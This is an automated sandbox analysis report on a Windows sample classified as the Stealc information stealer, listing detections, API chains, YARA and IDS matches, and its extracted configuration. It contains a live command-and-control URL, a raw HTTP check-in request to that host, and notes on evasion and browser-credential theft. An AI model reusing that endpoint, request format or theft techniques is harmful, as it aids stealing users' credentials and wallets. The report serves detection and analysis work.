Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ttFpxuMwKz.exe

Overview

General Information

Sample name:ttFpxuMwKz.exe
renamed because original name is a hash value
Original sample name:56f2a1223362b66cca9bf86b7cacad0c.exe
Analysis ID:1528814
MD5:56f2a1223362b66cca9bf86b7cacad0c
SHA1:484699fe4ecde29da1c5c73892881cea2f98eb8a
SHA256:b5a8df0c020433116e2ec77cb313fc9f6d17fa57a8256c41adf5eec6e693e145
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ttFpxuMwKz.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\ttFpxuMwKz.exe" MD5: 56F2A1223362B66CCA9BF86B7CACAD0C)
    • WerFault.exe (PID: 1672 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 804 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 812 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 836 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 844 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6172 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1040 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1336 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.122.184.144/f88d87a7e087e100.php", "Botnet": "default5_pal"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xfa0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2072891062.0000000000970000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.ttFpxuMwKz.exe.970000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.3.ttFpxuMwKz.exe.970000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.ttFpxuMwKz.exe.7e0e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.ttFpxuMwKz.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.ttFpxuMwKz.exe.7e0e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-08T10:18:27.165792+020020442431Malware Command and Control Activity Detected192.168.2.54970462.122.184.14480TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000000.00000003.2072891062.0000000000970000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.122.184.144/f88d87a7e087e100.php", "Botnet": "default5_pal"}
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: ttFpxuMwKz.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007E74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_007E74A7
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007E9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_007E9D27
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007F9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_007F9107
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007E9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_007E9DC7
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007ECA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_007ECA87

                      Compliance

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeUnpacked PE file: 0.2.ttFpxuMwKz.exe.400000.1.unpack
                      Source: ttFpxuMwKz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007EE077
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EF8F1 FindFirstFileA,0_2_007EF8F1
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_007EDCE7
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_007EC0D7
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007E1937
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007EF917
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007F4107
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_007EE697
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007F4B77
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007F3B17
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007F47D7
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_007EEF87

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.122.184.144:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: http://62.122.184.144/f88d87a7e087e100.php
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.122.184.144Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /f88d87a7e087e100.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHDHost: 62.122.184.144Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 36 31 46 44 42 41 44 46 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 2d 2d 0d 0a Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="hwid"DE61FDBADFAD2322695909------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="build"default5_pal------JEBKEHJJDAAAAKECBGHD--
                      Source: Joe Sandbox ViewASN Name: GORSET-ASRU GORSET-ASRU
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.122.184.144Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTP traffic detected: POST /f88d87a7e087e100.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHDHost: 62.122.184.144Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 36 31 46 44 42 41 44 46 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 2d 2d 0d 0a Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="hwid"DE61FDBADFAD2322695909------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="build"default5_pal------JEBKEHJJDAAAAKECBGHD--
                      Source: ttFpxuMwKz.exe, 00000000.00000002.2312303114.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144
                      Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/
                      Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php
                      Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php)
                      Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phpjk
                      Source: ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phprkJ
                      Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: String function: 004045C0 appears 317 times
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 804
                      Source: ttFpxuMwKz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: ttFpxuMwKz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@9/33@0/1
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\TUM2QOMO.htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6480
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\3625bb04-e9a9-443a-866c-e42d06968977Jump to behavior
                      Source: ttFpxuMwKz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\ttFpxuMwKz.exe "C:\Users\user\Desktop\ttFpxuMwKz.exe"
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 804
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 812
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 836
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 844
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1040
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1052
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1052
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1336
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: wuliwiyixenotafube.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeUnpacked PE file: 0.2.ttFpxuMwKz.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tojo:W;.tls:W;.jedemeb:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeUnpacked PE file: 0.2.ttFpxuMwKz.exe.400000.1.unpack
